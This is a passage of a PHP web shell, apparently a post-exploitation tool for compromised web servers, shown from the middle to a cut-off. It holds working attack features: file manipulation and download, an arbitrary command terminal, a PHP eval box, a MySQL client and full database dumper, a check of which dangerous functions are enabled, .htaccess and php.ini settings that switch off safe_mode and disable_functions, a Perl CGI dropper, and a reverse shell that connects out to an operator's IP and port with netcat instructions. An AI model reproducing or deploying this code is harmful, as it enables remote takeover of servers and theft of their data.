1491 $h[1].=sprintf('%02X',ord($c[$i])).' ';
1492 switch(ord($c[$i]))
1493 {
1494 case 0: $h[2].=' ';break;
1495 case 9: $h[2].=' ';break;
1496 case 10:$h[2].=' ';break;
1497 case 13:$h[2].=' ';break;
1498 default:$h[2].=$c[$i];break;
1499 }
1500 $n++;
1501 if($n==32)
1502 {
1503 $n=0;
1504 if($i+1 < $len)
1505 {
1506 $h[0].=sprintf('%08X',$i+1).'<br>';
1507 }
1508 $h[1].='<br>';
1509 $h[2].="\n";
1510 }
1511 }
1512 printf("
1513 <div id='hexdump'>
1514 <table class='hexdump'>
1515 <tr>
1516 <td><pre>%s</pre></td>
1517 <td><pre>%s</pre></td>
1518 <td><pre>%s</pre></td>
1519 </tr>
1520 </table>
1521 </div>",$h[0],$h[1],htmlspecialchars($h[2]));
1522 }
1523
1524 if($_REQUEST['a']=='cp'||$_REQUEST['a']=='mv')
1525 {
1526 printf("<form class='new' method='post'>
1527 <input type='text' name='file-dest' value='%s'/>
1528 <input type='Submit' value='%s' name='submit'/>
1529 <label>%s</label>
1530 </form>",$file,($_REQUEST['a']=='cp'?'Copy':'Move'),$status);
1531
1532 if(any("status",$_SESSION)) unset($_SESSION['status']);
1533
1534 if(any("submit",$_REQUEST))
1535 {
1536 $source=$file;
1537 $dest=$_REQUEST['file-dest'];
1538
1539 if(!file_exists($dest))
1540 {
1541 if ($_REQUEST['a']=='cp')
1542 {
1543 if(!copy(trim($source),trim($dest)))
1544 {
1545 $_SESSION['status']='Whoops, cannot copying...';
1546 }
1547 else
1548 {
1549 $_SESSION['status']="Copy file with success <a href=?a=v&r='" . urle($dest) . "'>'" . basename($dest) . "'</a>";
1550 }
1551 }
1552 elseif($_REQUEST['a']=='mv')
1553 {
1554 if(!copy(trim($source),trim($dest)))
1555 {
1556 $_SESSION['status']='Whoops, cannot moving...';
1557 }
1558 else
1559 {
1560 if(Remove($source))
1561 {
1562 $_SESSION['status']="Move file with success";
1563 $file=$dest;
1564 }
1565 else
1566 {
1567 $_SESSION['status']='Whoops, just copying...';
1568 }
1569 }
1570 }
1571 }
1572 else
1573 {
1574 $_SESSION['status']="Whoops, File was Exists <a href=?a=v&r='" . urle($dest) . "'>'" . basename($dest) . "'</a>";
1575 }
1576
1577 if($_REQUEST['a']=='cp')
1578 {
1579 header("location:".php_self."?a=cp&r=".urle($file));
1580 }
1581 elseif($_REQUEST['a']=='mv')
1582 {
1583 header("location:".php_self."?a=mv&r=".urle($file));
1584 }
1585 }
1586 }
1587
1588 if($_REQUEST['a']=='d')
1589 {
1590 if(file_exists($file))
1591 {
1592 header('Cache-Control:must-revalidate,post-check=0,pre-check=0');
1593 header('Content-Disposition:attachment;filename='.basename($file));
1594 header('Content-Type:application/octet-stream');
1595 header('Content-Description:File Transfer');
1596 header('Content-Transfer-Encoding:binary');
1597 header('Content-Length:'.filesize($file));
1598 header('Pragma:public');
1599 header('Expires:0');
1600 ob_clean();
1601 readfile($file);
1602 exit;
1603 }
1604 }
1605
1606 if($_REQUEST['a']=='x')
1607 {
1608 if(file_exists($file))
1609 {
1610 if(Remove($file))
1611 {
1612 header("location:".$back);
1613 }
1614 }
1615
1616 print '<font class="off">Cannot Delete</font>';
1617 }
1618 }
1619 else
1620 {
1621 print '<font class="off">File Not Found</font>';
1622 }
1623}
1624
1625if(any("x",$_REQUEST))
1626{
1627 if($_REQUEST['x']=="logout")
1628 {
1629 session_destroy();
1630 session_regenerate_id();
1631 header('location:'.php_self);
1632 }
1633 if($_REQUEST['x']=="secure")
1634 {
1635 $disable_functions=array_filter(array_map('trim',explode(',',ini_get("disable_functions"))));
1636
1637 $security=array('_xyec','allow_url_fopen','allow_url_include','apache_child_terminate','apache_get_modules','apache_getenv',
1638 'apache_note','apache_setenv','base64_decode','chdir','chgrp','chmod','chown','curl_exec','curl_multi_exec','dbase_open',
1639 'dbmopen','define_syslog_variables','disk_free_space','disk_total_space','diskfreespace','dl','dlopen','escapeshellarg',
1640 'escapeshellcmd','eval','exec','extract','filepro','filepro_retrieve','filepro_rowcount','fopen_with_path','fp','fput',
1641 'fputs','ftp_connect','ftp_exec','ftp_get','ftp_login','ftp_nb_fput','ftp_put','ftp_raw','ftp_rawlist','geoip_open',
1642 'get_cfg_var','get_current_user','get_num_redirects','getcwd','getenv','getlastmo','getmygid','getmyinode','getmypid',
1643 'getmyuid','getrusage','gzinflate','gzuncompress','highlight_file','hpAds_xmlrpcEncode','ini_alter','ini_get_all',
1644 'ini_restore','ini_set','inject_code','leak','link','listen','mainwork','mb_send_mail','mkdir','mkfifo','move_uploaded_file',
1645 'mysql_list_dbs','mysql_pconnect','openlog','parse_ini_file','passthru','pcntl_alarm','pcntl_exec','pcntl_fork',
1646 'pcntl_get_last_error','pcntl_getpriority','pcntl_setpriority','pcntl_signal','pcntl_signal_dispatch','pcntl_sigprocmask',
1647 'pcntl_sigtimedwait','pcntl_sigwaitinfo','pcntl_strerrorp','pcntl_wait','pcntl_waitpid','pcntl_wexitstatus','pcntl_wifexited',
1648 'pcntl_wifsignaled','pcntl_wifstopped','pcntl_wstopsig','pcntl_wtermsig','pfsockopen','phpAds_XmlRpc','phpAds_remoteInfo',
1649 'phpAds_xmlrpcDecode','phpAds_xmlrpcEncode','php_uname','phpinfo','popen','posix_getgrgid','posix_getlogin','posix_getpwuid',
1650 'posix_kill','posix_mkfifo','posix_setpgid','posix_setsid','posix_setuid','posix_ttyname','posix_uname','posixc','proc_close',
1651 'proc_get_stats','proc_get_status','proc_nice','proc_open','proc_terminate','ps_aux','putenv','readlink','rename','rmdir',
1652 'runkit_function_rename','set_time_limit','sh2_exec','shell_exec','show_source','sleep','socket_accept','socket_bind',
1653 'socket_clear_error','socket_close','socket_connect','socket_create','socket_create_listen','socket_create_pair',
1654 'socket_get_option','socket_getpeername','socket_getsockname','socket_last_error','socket_listen','socket_read',
1655 'socket_recv','socket_recvfrom','socket_select','socket_send','socket_sendto','socket_set_block','socket_set_nonblock',
1656 'socket_set_option','socket_shutdown','socket_strerror','socket_write','str_rot13','stream_select','stream_socket_server',
1657 'symlink','syslog','system','tp_exec','virtual','xmlrpc_entity_decode');
1658
1659 sort($security);
1660 $fucks=array_unique(array_merge($disable_functions,$security));
1661 $table="";
1662 $enable=0;
1663 $disable=0;
1664 $die=array();
1665 $ready=array();
1666 $off=array();
1667 $total=count($fucks);
1668
1669 foreach($fucks as $fuck)
1670 {
1671 $table.="<tr><td></td><td>$fuck</td><td>";
1672 if(in_array($fuck,$disable_functions))
1673 {
1674 $table.="<center><font color=red>DIE</font></center>";
1675 $die[]=$fuck;
1676 $disable++;
1677 }
1678 else
1679 {
1680 if(function_exists($fuck)||is_callable($fuck))
1681 {
1682 $table.="<center><font color=white>READY</font></center>";
1683 $ready[]=$fuck;
1684 $enable++;
1685 }
1686 else
1687 {
1688 $table.="<center><font color=orange>OFF</font></center>";
1689 $off[]=$fuck;
1690 $disable++;
1691 }
1692 }
1693 $table.="</td></tr>";
1694 }
1695
1696 $risk=($enable/$total)*100;
1697 $secure=($disable/$total)*100;
1698
1699 printf("<h2 style='text-align:center'>Sec. Info v2.0.%s</h2><br>
1700 <h4 style='text-align:center;color:white'>Risks Rate <font color=red>[%s%%]</font> | Secure Rate <font color=#00ff00>[%s%%]</font></h4><br><br>
1701 <div class='auto-number'>
1702 <table class='table sortable'>
1703 <thead>
1704 <tr>
1705 <th class='sorttable_nosort' width='15'>No.</th>
1706 <th>Disable Function</th>
1707 <th>Status</th>
1708 </tr>
1709 </thead>
1710 <tbody>
1711 %s
1712 </tbody>
1713 </table>
1714 <fieldset style='margin-bottom:15px'>
1715 <legend>Ready List</legend>
1716 <textarea>%s</textarea>
1717 </fieldset>
1718 <div class='divide'>
1719 <div class='divide-left'>
1720 <fieldset style='margin-bottom:15px'>
1721 <legend>Off List</legend>
1722 <textarea>%s</textarea>
1723 </fieldset>
1724 </div>
1725 <div class='divide-right'>
1726 <fieldset>
1727 <legend>Die List</legend>
1728 <textarea>%s</textarea>
1729 </fieldset>
1730 </div>
1731 </div>",$total,round($risk,2),round($secure,2),$table,implode($ready, ', '),implode($off, ', '),implode($die, ', '));
1732 }
1733 if($_REQUEST['x']=="info")
1734 {
1735 printf("<div id='php-configuration'>
1736 <form onsubmit='return false;' class='new'>
1737 <select id='php-config'>
1738 <option value='4'>INFO_CONFIGURATION</option>
1739 <option value='16' selected>INFO_ENVIRONMENT</option>
1740 <option value='32'>INFO_VARIABLES</option>
1741 <option value='8'>INFO_MODULES</option>
1742 <option value='1'>INFO_GENERAL</option>
1743 <option value='2'>INFO_CREDITS</option>
1744 <option value='64'>INFO_LICENSE</option>
1745 <option value='-1'>INFO_ALL</option>
1746 </select>
1747 <input type='submit' onclick=\"return getAjax(true,'php-info','POST','?x=info&xa=envirolment&config='+document.getElementById('php-config').value);\"/><br>
1748 </form>
1749 </div>
1750 <div id='php-info' class='result'></div>");
1751
1752 $cores=array('PHP_VERSION','PHP_MAJOR_VERSION','PHP_MINOR_VERSION','PHP_RELEASE_VERSION','PHP_VERSION_ID',
1753 'PHP_EXTRA_VERSION','PHP_ZTS','PHP_DEBUG','PHP_MAXPATHLEN','PHP_OS','PHP_OS_FAMILY','PHP_SAPI',
1754 'PHP_EOL','PHP_INT_MAX','PHP_INT_MIN','PHP_INT_SIZE','PHP_FLOAT_DIG','PHP_FLOAT_EPSILON',
1755 'PHP_FLOAT_MIN','PHP_FLOAT_MAX','DEFAULT_INCLUDE_PATH','PEAR_INSTALL_DIR','PEAR_EXTENSION_DIR',
1756 'PHP_EXTENSION_DIR','PHP_PREFIX','PHP_BINDIR','PHP_BINARY','PHP_MANDIR','PHP_LIBDIR','PHP_DATADIR',
1757 'PHP_SYSCONFDIR','PHP_LOCALSTATEDIR','PHP_CONFIG_FILE_PATH','PHP_CONFIG_FILE_SCAN_DIR',
1758 'PHP_SHLIB_SUFFIX','PHP_FD_SETSIZE');
1759
1760 $table="";
1761 foreach($cores as $core)
1762 {
1763 $table.="<tr><td>".$core."</td><td>".@constant($core)."</td></tr>";
1764 }
1765
1766 printf("<h2>Core Predefined Constants</h2><br>
1767 <table class='table'>
1768 <thead>
1769 <tr>
1770 <th>Predefined Constants</th>
1771 <th>Value</th>
1772 </tr>
1773 <tbody>%s</tbody>
1774 </table>",$table);
1775
1776 if(any("xa",$_REQUEST)&&$_REQUEST['xa']=="envirolment")
1777 {
1778 ob_clean();
1779 phpinfo($_REQUEST['config']);
1780 $phpinfo=ob_get_contents();
1781 ob_end_clean();
1782 $phpinfo=preg_replace('%^.*<body>(.*)</body>.*$%ms','$1',$phpinfo);
1783 printf("<div id='phpinfo'>%s</div>",$phpinfo);
1784 exit;
1785 }
1786 }
1787 if($_REQUEST['x']=="db")
1788 {
1789 $connect=any("connect",$_SESSION)?$_SESSION['connect']:"";
1790 $status=any("status",$_SESSION)?$_SESSION['status']:"";
1791 $query=any("query",$_REQUEST)?$_REQUEST['query']:"show databases;";
1792
1793 if($connect=='true')
1794 {
1795 $process="";
1796 $sql=mysql_connect($_SESSION['host'],$_SESSION['user'],$_SESSION['pass']);
1797 $result=mysql_list_processes($sql);
1798 while($row=mysql_fetch_assoc($result))
1799 {
1800 $process.=sprintf("<tr>
1801 <td>%s</td><td>%s</td><td>%s</td>
1802 <td>%s</td><td>%s</td></tr>",
1803 $row["Id"],$row["Host"],$row["db"],
1804 $row["Command"],$row["Time"]);
1805 }
1806 mysql_free_result($result);
1807
1808 printf("<div class='database-session'>
1809 <div class='database-query'>
1810 <form action='?x=db&xa=qry' method='post'>
1811 <label>MYSQL Query<hr></label><br>
1812 <label><i style='color:#222'>
1813 show databases;<br>
1814 show tables from {database};<br>
1815 show columns from {database}.{table};<br>
1816 select count(*) from {database}.{table};<br>
1817 select * from {database}.{table}limit 0,10;</i></label>
1818 <textarea id='query' name='query'>%s</textarea><br>
1819 <input type='submit' name='disconnect' value='Disconnect'/>
1820 <input type='submit' value='Execute'/>
1821 </form>
1822 </div>
1823 <div class='database-process'>
1824 <div class='mysql-process-result'>
1825 <label>Database Process <a href='?x=db&xa=proc'>♻</a><hr></label>
1826 <table class='table table-bordered'>
1827 <thead>
1828 <tr>
1829 <th>Id</th>
1830 <th>Host</th>
1831 <th>Database</th>
1832 <th>Command</th>
1833 <th>Time</th>
1834 </tr>
1835 </thead>
1836 <tbody>%s</tbody>
1837 </table>
1838 </div>
1839 <div class='database-dump'>
1840 <label>Database Dump<hr></label>
1841 <form action='?x=db&xa=dmp' method='post'><br>
1842 <label>Database</label><input type='text' name='database' value=''/><br>
1843 <label>Output</label><input type='text' name='output' value='%s'/><br>
1844 <input type='submit' value='Dump' />
1845 <label>%s</label>
1846 </form>
1847 </div>
1848 </div>
1849 <div class='clr'></div>
1850 </div>
1851 ",$query,$process,$dir,$status);
1852 }
1853 else
1854 {
1855 printf("<div id='database'>
1856 <form action='?x=db&xa=db' method='post' class='new'><br>
1857 <label>Host</label><input type='text' name='host' value='localhost'/><br>
1858 <label>Port</label><input type='text' name='port' value='3306'/><br>
1859 <label>Username</label><input type='text' name='user' value='root'/><br>
1860 <label>Password</label><input type='text' name='pass' value=''/><br>
1861 <label>Database</label><input type='text' name='dbas' value=''/><br>
1862 <input type='submit' value='Connect'/>
1863 </form>
1864 </div>");
1865 }
1866
1867 if(any("rs",$_REQUEST))
1868 {
1869 $_SESSION[$_REQUEST['rs']]='';
1870 }
1871
1872 if(any("cd",$_REQUEST))
1873 {
1874 $_SESSION['qdb']=$_REQUEST['cd'];
1875 }
1876
1877 if(any("ct",$_REQUEST))
1878 {
1879 $_SESSION['qtb']=$_REQUEST['ct'];
1880 }
1881
1882 if(any("xa",$_REQUEST)&&$_REQUEST['xa']=="db")
1883 {
1884 $cn=mysqli_connect($_REQUEST['host'],$_REQUEST['user'],$_REQUEST['pass'],$_REQUEST['dbas'],$_REQUEST['port']);
1885
1886 $_SESSION['host']=$_REQUEST['host'];
1887 $_SESSION['port']=$_REQUEST['port'];
1888 $_SESSION['user']=$_REQUEST['user'];
1889 $_SESSION['pass']=$_REQUEST['pass'];
1890 $_SESSION['dbas']=$_REQUEST['dbas'];
1891
1892 if($cn)
1893 {
1894 $_SESSION['connect']='true';
1895 header('location:'.php_self.'?x=db');
1896 }
1897 else
1898 {
1899
1900 $_SESSION['connect']='false';
1901 printf("<b class='off'>Connection Failed</b>");
1902 }
1903 }
1904
1905 if(any("xa",$_REQUEST)&&$_REQUEST['xa']=="qry")
1906 {
1907 $_SESSION['status']='';
1908 $con=mysqli_connect($_SESSION['host'],$_SESSION['user'],$_SESSION['pass'],$_SESSION['dbas'],$_SESSION['port']);
1909
1910 if(isset($_REQUEST['disconnect']))
1911 {
1912 mysqli_close($con);
1913 unset($_SESSION['connect']);
1914 unset($_SESSION['query']);
1915 unset($_SESSION['host']);
1916 unset($_SESSION['user']);
1917 unset($_SESSION['pass']);
1918 unset($_SESSION['dbas']);
1919 unset($_SESSION['qdb']);
1920 unset($_SESSION['qtb']);
1921 header('location:'.php_self.'?x=db');
1922 }
1923
1924 $sql=!empty($_REQUEST['query'])?$_REQUEST['query']:"show databases;";
1925 $result=mysqli_query($con,$sql);
1926 $data=array();
1927 $name=array();
1928
1929 if($result)
1930 {
1931 while($fieldinfo=mysqli_fetch_field($result))
1932 {
1933 $name[]=$fieldinfo->name;
1934 }
1935 $data[]=$name;
1936 while($row=mysqli_fetch_row($result))
1937 {
1938 $data[]=$row;
1939 }
1940 mysqli_free_result($result);
1941 }
1942 else
1943 {
1944 $data=false;
1945 }
1946
1947 if($data!==false)
1948 {
1949 $sqdb=@$_SESSION['qdb'];
1950 $sqtb=@$_SESSION['qtb'];
1951
1952 $bsdb="<a href='?x=db&xa=qry&rs=qdb&query=show databases;'>Database</a>";
1953 $bqdb=!empty($_SESSION['qdb'])?"→ <a href='?x=db&xa=qry&rs=qtb&query=show tables from $sqdb;'>$sqdb</a>":"";
1954 $bqtb=!empty($_SESSION['qtb'])?"→ <a href='?x=db&xa=qry&query=show columns from $sqdb.$sqtb;'>$sqtb</a>":"";
1955
1956 printf("<div class='database=table'>
1957 <div class='database-breadcrumb'>%s %s %s</div>
1958 <div class='auto-number'>
1959 <table class='table sortable'>",$bsdb,$bqdb,$bqtb);
1960
1961 foreach($data as $key => $val)
1962 {
1963 if(is_array($val))
1964 {
1965 if($key==0)
1966 {
1967 print "<tr><th class='sorttable_nosort'>☰</th>";
1968 foreach($val as $key2 => $val2)
1969 {
1970 if(!is_array($val2))
1971 {
1972 print "<th>".$val2."</th>";
1973 }
1974 }
1975 print "</tr>";
1976 }
1977 else
1978 {
1979 print "<tr><td width='15'></td>";
1980 foreach($val as $key3 => $val3)
1981 {
1982 if(!is_array($val3))
1983 {
1984 if(strpos($val2,'Database')!==false)
1985 {
1986 print "<td><a href='?x=db&xa=qry&cd=$val3&query=show tables from $val3;'>$val3</a></td>";
1987 }
1988 elseif(strpos($val2,'Tables')!==false)
1989 {
1990 $val4=substr($val2,strpos($val2,'Tables_in_')+10);
1991 print "<td><a href='?x=db&xa=qry&cd=$val4&ct=$val3&query=select * from $val4.$val3 limit 0,10;'>$val3</a></td>";
1992 }
1993 else
1994 {
1995 print "<td>$val3</td>";
1996 }
1997 }
1998 }
1999 print "</tr>";
2000 }
2001 }
2002 }
2003 print "</table></div></div>";
2004 }
2005 else
2006 {
2007 print '<span class=off>Query not Executed</span>';
2008 }
2009 }
2010
2011 if(any("xa",$_REQUEST)&&$_REQUEST['xa']=="dmp")
2012 {
2013 $database=$_REQUEST['database'];
2014 $output=$_REQUEST['output'];
2015 if (!file_exists($output)&&!empty($database))
2016 {
2017 $link=mysqli_connect($_SESSION['host'],$_SESSION['user'],$_SESSION['pass'],null,$_SESSION['port']);
2018 mysqli_set_charset($link,'utf8');
2019 mysqli_select_db($link,$database);
2020 $tables=array();
2021 $result=mysqli_query($link,'SHOW TABLES');
2022 while($row=mysqli_fetch_row($result))
2023 {
2024 $tables[]=$row[0];
2025 }
2026 $return='SET FOREIGN_KEY_CHECKS=0;' . "\r\n";
2027 $return.='SET SQL_MODE="NO_AUTO_VALUE_ON_ZERO";' . "\r\n";
2028 $return.='SET AUTOCOMMIT=0;' . "\r\n";
2029 $return.='START TRANSACTION;' . "\r\n";
2030 foreach($tables as $table)
2031 {
2032 $result=mysqli_query($link,'SELECT * FROM '.$table);
2033 $num_fields=mysqli_num_fields($result);
2034 $num_rows=mysqli_num_rows($result);
2035 $i_row=0;
2036 $row2=mysqli_fetch_row(mysqli_query($link,'SHOW CREATE TABLE '.$table));
2037 $return.="\n\n".$row2[1].";\n\n";
2038 if ($num_rows!==0) {
2039 $row3=@mysqli_fetch_fields($result);
2040 $return.='INSERT INTO '.$table.'( ';
2041 foreach ($row3 as $th)
2042 {
2043 $return.='`'.$th->name.'`,';
2044 }
2045 $return=substr($return,0,-2);
2046 $return.=' ) VALUES';
2047 for ($i=0;$i < $num_fields;$i++)
2048 {
2049 while($row=mysqli_fetch_row($result))
2050 {
2051 $return.="\n(";
2052 for($j=0;$j<$num_fields;$j++)
2053 {
2054 $row[$j]=addslashes($row[$j]);
2055 $row[$j]=preg_replace("#\n#","\\n",$row[$j]);
2056 if (isset($row[$j])) { $return.='"'.$row[$j].'"';}else { $return.='""';}
2057 if ($j<($num_fields-1)) { $return.=',';}
2058 }
2059 if (++$i_row==$num_rows) {
2060 $return.=");";
2061 }else {
2062 $return.="),";
2063 }
2064 }
2065 }
2066 }
2067 $return.="\n\n\n";
2068 }
2069 $return .='SET FOREIGN_KEY_CHECKS=1;' . "\r\n";
2070 $return.='COMMIT;';
2071 $output=end(explode(".",$output))=='sql'?$output:$output.'.sql';
2072 $handle=fopen($output,'w+');
2073 fwrite($handle,$return);
2074 fclose($handle);
2075 $_SESSION['status']=sprintf("Dump with success... <a href='?a=v&r=%s' target='_blank'>'%s'</a>",urle($output),basename($output));
2076 }
2077 else
2078 {
2079 $_SESSION['status']="<span class=off>Dump Error</span>";
2080 }
2081
2082 header('location:'.php_self.'?x=db');
2083 }
2084
2085 }
2086 if($_REQUEST['x']=="terminal")
2087 {
2088 printf("
2089 <div id='terminal'>
2090 <textarea id='prompt-terminal' class='cmd' cols='122' rows='20' readonly>%s</textarea>
2091 <form onsubmit='return false;'>
2092 <label id='curdir-terminal'>$ %s:</label>
2093 <input type='text' id='terminal-input' autocomplete='off' onfocus=\"\" onkeydown=\"
2094 if(event.keyCode==13)
2095 {
2096 temp=this.value;
2097 this.value='';
2098 getAjax(true,'curdir-terminal','POST','?x=terminal&xa=terminals-curdir&cmd='+temp);
2099 return getAjax(false,'prompt-terminal','POST','?x=terminal&xa=terminals&cmd='+temp);
2100 }
2101 \" class='cmd' name=cmd cols=122 rows=2></input>
2102 </form>
2103 </div>",Execute('whoami'),$dir);
2104
2105 if(any("xa",$_REQUEST)&&$_REQUEST['xa']=="terminals")
2106 {
2107 ob_clean();
2108 $command=!empty($_REQUEST['cmd'])?$_REQUEST['cmd']:"whoami";
2109 @chdir($dir);
2110 $charset='UTF-8';
2111 if(!Unix())
2112 {
2113 $charset='Windows-1251';
2114 }
2115 $ret=iconv($charset,'UTF-8',Execute($command));
2116 print $ret;
2117 exit;
2118 }
2119 elseif(any("xa",$_REQUEST)&&$_REQUEST['xa']=="terminals-curdir")
2120 {
2121 ob_clean();
2122 $command=!empty($_REQUEST['cmd'])?$_REQUEST['cmd']:"whoami";
2123 if (preg_match('/cd (.*)/',$command,$dirx))
2124 {
2125 if ($dirx[1]=='..')
2126 {
2127 $dir=substr($dir,0,strrpos($dir,_));
2128 if (strlen($dir)<=2) $dir=$dir._;
2129 }
2130 else
2131 {
2132 if (is_dir($dirx[1]))
2133 {
2134 $dir=realpath($dirx[1]);
2135 }
2136 }
2137 }
2138 $_SESSION['c']=urle($dir);
2139 print '$ '.$dir.':';
2140 exit;
2141 }
2142 }
2143 if($_REQUEST['x']=="connect")
2144 {
2145 printf("<div id='connect'>
2146 <div class='connect-left'>
2147 <div class='Reverse-connect'>
2148 <fieldset>
2149 <legend>Reverse Connect</legend>
2150 <form action='?x=connect&xa=reverse-connect' method='post' onsubmit=\"
2151 return confirm('HOST will FUCKED ON ur PC or LAPTOP ?!\\nMake Sure ur FIREWALL OFF ?!\\nUSE NETCAT {nc -lvp ' + document.getElementById('reverse-port').value+'}\\n\\nTYPE \'exit\' or \'quit\' to TERMINATE')\">
2152 <label>Remote Ip</label><input type='text' name='reverse-ip' value='%s'/><br>
2153 <label>Remote Port</label><input type='text' id='reverse-port' name='reverse-port' value='1337'/><br>
2154 <label>Socket</label><select name='socket'>
2155 <option value='fsockopen'>fsockopen</option>
2156 <option value='socket_create'>socket_create</option>
2157 <option value='stream_socket_client'>stream_socket_client</option>
2158 </select><br>
2159 <input type='submit' value='Connect' />
2160 </form>
2161 </fieldset>
2162 </div>
2163 </div>
2164 <div class='connect-right'>
2165 <div class='status-connect'>
2166 <fieldset>
2167 <legend>Status</legend>
2168 <div id='connect-result'>Terminal: %s",
2169 remote_addr,Execute('whoami')
2170 );
2171
2172 if(any("xa",$_REQUEST)&&$_REQUEST['xa']=="reverse-connect")
2173 {
2174 if($_REQUEST['socket']=="fsockopen")
2175 {
2176 $host=$_REQUEST['reverse-ip'];
2177 $port=$_REQUEST['reverse-port'];
2178 $sock=@fsockopen($host,$port,$errno,$errstr);
2179 if($errno!=0)
2180 {
2181 printf("<font color='red'><b>%s</b>:%s</font>",$errno,$errstr);
2182 }
2183 else
2184 {
2185 while(!feof($sock))
2186 {
2187 fwrite($sock,"[b4tm4n]:");
2188 $command=fgets($sock,1024);
2189 if(trim($command)=='quit'||trim($command)=='exit')
2190 {
2191 fclose($sock);
2192 printf($command);
2193 exit;
2194 }
2195 fwrite($sock,Execute($command));
2196 }
2197 fclose($sock);
2198 }
2199 }
2200 else if($_REQUEST['socket']=="socket_create")
2201 {
2202 $host=$_REQUEST['reverse-ip'];
2203 $port=$_REQUEST['reverse-port'];
2204 $sock=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);
2205 socket_set_nonblock($sock);
2206 if(!$sock)
2207 {
2208 printf("<font color='red'>Connection Error</font>");
2209 }
2210 else
2211 {
2212 while(!@socket_connect($sock,$host,$port))
2213 {
2214 @socket_write($sock,"[b4tm4n]:",strlen ("[b4tm4n]:"));
2215 $input=@socket_read($sock,1024,PHP_NORMAL_READ);
2216 if (trim($input)=='quit'||trim($input)=='exit')
2217 {
2218 socket_set_block($sock);
2219 socket_close($sock);
2220 printf($input);
2221 exit;
2222 }
2223 @socket_write($sock,Execute($input),strlen (Execute($input)));
2224 }
2225 socket_set_block($sock);
2226 socket_close($sock);
2227 }
2228 }
2229 else if($_REQUEST['socket']=="stream_socket_client")
2230 {
2231 $host=$_REQUEST['reverse-ip'];
2232 $port=$_REQUEST['reverse-port'];
2233 $sock=@stream_socket_client("tcp://$host:$port",$errno,$errstr);
2234 if (!$sock)
2235 {
2236 printf("<font color='red'><b>%s</b>:%s</font>",$errno,$errstr);
2237 }
2238 else
2239 {
2240 while(!feof($sock))
2241 {
2242 fwrite($sock,"[b4tm4n]:");
2243 $command=fgets($sock,1024);
2244 if(trim($command)=='quit'||trim($command)=='exit')
2245 {
2246 fclose($sock);
2247 printf($command);
2248 exit;
2249 }
2250 fwrite($sock,Execute($command));
2251 }
2252 fclose($sock);
2253 }
2254 }
2255 }
2256 printf("</fieldset></div></div></div></div>");
2257 }
2258 if($_REQUEST['x']=="htaccess")
2259 {
2260 $php_ini=array(
2261 "php_value upload_max_filesize 32M",
2262 "php_value post_max_size 32M",
2263 "php_flag safe_mode Off",
2264 "php_value disable_functions null",
2265 "php_flag safe_mode_gid Off",
2266 "php_value open_basedir $dir",
2267 "php_flag register_globals On",
2268 "php_flag exec On",
2269 "php_flag shell_exec On");
2270
2271 $htaccess=array(
2272 "Options All",
2273 "Allow From All",
2274 "Satisfy Any");
2275
2276 printf("
2277 <div class='divide'>
2278 <div class='divide-left'>
2279 <textarea>%s</textarea>
2280 </div>
2281 <div class='divide-right'>
2282 <textarea>%s</textarea>
2283 </div>
2284 </div>",implode($php_ini,"\n"),implode($htaccess,"\n"));
2285 }
2286 if($_REQUEST['x']=="php")
2287 {
2288 $exp=array(
2289 "print_r(get_extension_funcs('Core'));",
2290 "print_r(get_loaded_extensions());",
2291 "print_r(ini_get_all('pcre'));",
2292 "print_r(ini_get_all());",
2293 "print_r(get_defined_constants());",
2294 "print_r(get_defined_functions());",
2295 "print_r(get_declared_classes());");
2296
2297 printf("<div id='php'>
2298 <form onsubmit='return false;'>
2299 <div class='php-left'>
2300 <textarea id='php-code' cols='122' rows='20'>%s</textarea>
2301 </div>
2302 <div class='php-right'>
2303 <textarea id='php-eval' cols='122' rows='20' readonly></textarea>
2304 </div>
2305 <input type='submit' id='php-submit' onclick=\"getAjax(false,'php-eval','POST','?x=php&codex='+document.getElementById('php-code').value);\" class='php-code' name=php-code cols=122 rows=20 value='Inject'/>
2306 <input type='submit' id='php-submit' onclick=\"getAjax(false,'php-eval','POST','?x=php&code='+document.getElementById('php-code').value);\" class='php-code' name=php-code cols=122 rows=20 value='Run'/>
2307 </form>
2308 </div>",implode($exp,"\n"));
2309
2310 if(any("code",$_REQUEST))
2311 {
2312 ob_clean();
2313 $code=trim($_REQUEST['code']);
2314 $evil=Evil($code);
2315 exit;
2316 }
2317 if(any("codex",$_REQUEST))
2318 {
2319 ob_clean();
2320 $code=trim($_REQUEST['codex']);
2321 $evil=Evil($code,true);
2322 exit;
2323 }
2324 }
2325 if($_REQUEST['x']=="perl")
2326 {
2327 print 'PHP Perl Class: '.(class_exists('Perl')?"<b class='on'>ON</b>":"<b class='off'>OFF</b>").'<br>';
2328
2329 if(Unix())
2330 {
2331 if(file_exists("/usr/bin/perl"))
2332 {
2333 $path_perl="/usr/bin/perl";
2334 }
2335 else
2336 {
2337 $path_perl="/usr/bin/env perl";
2338 }
2339 }
2340 else
2341 {
2342 if(file_exists("C:\\perl\bin\perl.exe"))
2343 {
2344 $path_perl="C:\\perl\bin\perl.exe";
2345 }
2346 elseif(file_exists("C:\\wamp\bin\perl.exe"))
2347 {
2348 $path_perl="C:\\wamp\bin\perl.exe";
2349 }
2350 elseif(file_exists("C:\\xampp\perl\bin\perl.exe"))
2351 {
2352 $path_perl="C:\\xampp\perl\bin\perl.exe";
2353 }
2354 }
2355
2356 $script=array(
2357 "#!$path_perl",
2358 "use strict;",
2359 "use warnings;",
2360 "use CGI;",
2361 "print CGI::header();",
2362 "print 'k4mpr3t on CGI';");
2363
2364 $htaccess=array(
2365 "Options +ExecCGI +SymLinksIfOwnerMatch",
2366 "DirectoryIndex index.ler",
2367 "AddType application/x-httpd-cgi .ler",
2368 "AddHandler cgi-script .ler");
2369
2370 $path=$dir._.'cgi-bin';
2371 $file=$path._.'perl.ler';
2372 $file2=$path._.'.htaccess';
2373
2374 $scripts=implode($script,"\n");
2375 $htaccesss=implode($htaccess,"\n");
2376
2377 if(!is_dir($path))
2378 {
2379 mkdir($path,0755);
2380 }
2381 if(!is_file($file))
2382 {
2383 $op=fopen($file,'w+');
2384 fwrite($op,$scripts);
2385 fclose($op);
2386 chmod($file,0755);
2387 }
2388 if(!is_file($file2))
2389 {
2390 $op=fopen($file2,'w+');
2391 fwrite($op,$htaccesss);
2392 fclose($op);
2393 chmod($file2,0755);
2394 }
2395
2396 $redirect=GetUrlFromPath($file);
2397 printf("Tested -> <a href='$redirect' target='_blank'><u>Link</u></a>");
2398
2399 if (class_exists('Perl'))
2400 {
2401 //$perl=Perl::getInstance();
2402 $perl=new Perl();
2403 $perl->eval("print \"Executing Perl code in PHP\n\"");
2404 print "Hello from PHP! ";
2405
2406 //$perl=new Perl();
